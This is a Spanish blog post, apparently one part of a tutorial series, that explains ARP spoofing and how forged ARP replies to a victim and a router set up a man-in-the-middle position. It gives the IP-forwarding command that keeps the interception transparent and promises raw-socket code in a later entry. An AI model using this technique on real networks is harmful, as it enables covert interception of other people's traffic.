�Menuda chapa! vamos a asimilarla con la pr�ctica.

Vamos a dejar por el momento las comederas de cabeza hasta la tercera entrada, y vamos con lo divertido.

Construyendo nuestra primer herramienta

Dije que convertir�amos el c�digo del ejemplo en algo m�s funcional y divertido, vamos hacer una herramienta que nos permita hacer un Man In The Middle.

Si estas leyendo esta entrada supongo que sabras que es un MITM y en que consiste un ataque de falsificaci�n ARP o ARP Spoofing, pero vamos a recordarlo a grandes rasgos.

El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados o spoofed) a la Ethernet. Normalmente la finalidad es asociar la direcci�n MAC del atacante con la direcci�n IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway).

Esta t�cnica de arp spoofing, si se hace de manera bidireccional obtenemos el resultado de un ataque man in the middle.

Es decir el atacante le dice ala red (todos los equipos) o a la v�ctima (ataque dirigido)  que es el gateway . El medio del ataque es el envenenamiento de las tablas ARP de los equipos.

Vamos a establecer el escenario:

Supongamos que se da la siguiente situaci�n:

Queremos poder capturar el tr�fico que manda la v�ctima hacia INet... y lo m�s natural ser�a colocarnos en medio; de ah� lo de MITM...

�C�mo conseguimos esto?: mediante paquetes ARP-Reply, en primer lugar a la v�ctima le decimos que somos el router mand�ndole un ARP-reply y diciendo que a nuestra mac le corresponde la ip del router.
El protocolo ARP, al carecer de mecanismos de autentificacion y si en el equipo no se ha establecido unas tablas ARP fijas, actualizara la la tabla ARP de la victima con la nueva informaci�n...en lo que respeta a el equipo v�ctima somos el router.

El siguiente paso ser� mandar un paquete ARP-reply al router dici�ndole que somos la v�ctima, el protocolo ARP modificar� la tabla Arp del router como hizo con la victima. Podremos interceptar la informaci�n bi-direccionalmente, siempre de manera transparente para la victima siempre y cuando tengamos activado el IP forward en nuestro equipo (echo 1 > /proc/sys/net/ipv4/ip_forward).

Y �c�mo podemos manipular los paquetes ARP? pues chatos: con SOCK_RAW!

Pero esto ser� en la siguiente entrada..

Un saludo

    Manuel


download file now

Read more »